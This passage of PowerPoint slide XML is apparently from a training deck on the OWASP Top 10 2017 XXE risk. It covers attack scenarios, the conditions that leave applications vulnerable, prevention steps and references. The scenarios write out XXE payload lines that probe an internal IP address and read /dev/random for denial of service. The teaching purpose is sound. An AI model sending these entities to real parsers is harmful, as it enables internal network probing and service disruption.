                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    &lt;foo&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;&lt;/foo&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: An attacker probes the server's private network by changing the above ENTITY line to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM "https://192.168.1.1/private" &gt;]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: An attacker attempts a denial-of-service attack by including a potentially endless file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   &lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM "file:///dev/random" &gt;]&gt;</a:t>
            </a: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XXE?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Applications and in particular XML-based web services or downstream integrations might be vulnerable to attack if:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1"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spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Your application accepts XML directly or XML uploads, especially from untrusted sources, or inserts untrusted data into XML documents, which is then parsed by an XML processor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Any of the XML processors in the application or SOAP based web services has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>document type definitions (DTDs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> enabled. As the exact mechanism for disabling DTD processing varies by processor, it is recommended that you consult a reference such as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP XXE Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If your application uses SOAP prior to version 1.2, it is likely susceptible to XXE attacks if XML entities are being passed to the SOAP framework.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SAST tools can help detect XXE in source code, although manual code review is the best alternative in large, complex apps with many integrations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Being vulnerable to XXE attacks likely means that you are vulnerable to other billion laughs denial-of-service attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="143510" indent="-143510">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId6"/>
            </a:endParaRP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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"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itchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-8280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hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide - Testing for XML Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1"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hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP XXE Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"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hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP XXE Prevention Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"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hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP XML Security Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId11"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-8280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hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>CWE-611 Improper Restriction of XXE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng"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hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Billion Laughs Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Developer training is essential to identify and mitigate XXE completely. Besides that, p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reventing XXE requires:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Disable XML external entity and DTD processing in all XML parsers in your application, as per the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP XXE Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Implement positive ("white listing") input validation, filtering, or sanitization to prevent hostile data within XML documents, headers, or nodes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Verify that XML or XSL file upload functionality validates incoming XML using XSD validation or similar.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Patch or upgrade all the latest XML processors and libraries in use by the app or on the underlying operating system. The use of dependency checkers is critical in managing the risk from necessary libraries and components in not only your app, but any downstream integrations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Upgrade SOAP to the latest version.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If these controls are not possible, consider using virtual patching, API security gateways, or WAFs to detect, monitor, and block XXE attacks. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="143510" indent="-143510">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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A4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="76199"/>
            <a:ext cx="5486400" cy="762001"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XML External Entities (XXE)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3904300408"/>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pPr>
                        <a:buNone/>
                      </a:pPr>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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Prevalence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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:r>
